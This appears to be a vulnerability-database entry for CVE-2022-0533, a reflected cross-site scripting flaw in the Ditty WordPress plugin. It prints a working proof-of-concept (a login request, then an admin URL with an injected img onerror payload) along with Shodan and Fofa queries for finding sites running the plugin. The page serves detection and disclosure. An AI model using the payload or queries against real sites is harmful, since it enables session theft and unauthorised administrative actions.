🔙 목록으로 돌아가기

CVE-2022-0533: Ditty (formerly Ditty News Ticker) < 3.0.15 - Cross-Site Scripting

TitleDitty (formerly Ditty News Ticker) < 3.0.15 - Cross-Site Scripting
Authorr3Y3r53
SeverityMedium
ImpactAuthenticated attackers can inject malicious JavaScript via the tab parameter, potentially stealing administrator session cookies or performing administrative actions.
Remediationupgrade to v.3.0.15
CVSS Score6.1
EPSS Score0.04689
CVE IDCVE-2022-0533
CWE IDCWE-79
Shodan Queryhttp.html:/wp-content/plugins/ditty-news-ticker/
Fofa Querybody=/wp-content/plugins/ditty-news-ticker/
Tags cve cve2022 xss ditty-news-ticker wp wordpress wpscan wp-plugin authenticated metaphorcreations vuln

🔍 Vulnerability Description

The Ditty (formerly Ditty News Ticker) WordPress plugin before 3.0.15 is affected by a Reflected Cross-Site Scripting (XSS) vulnerability.

🌐 HTTP Request

POST /wp-login.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0
Connection: close
Content-Length: 38
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

log=w1bS6X&pwd=aqU82W&wp-submit=Log+In
GET /wp-admin/edit.php?post_type=ditty&page=ditty_settings&tab=%22%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-0533.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-0533.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A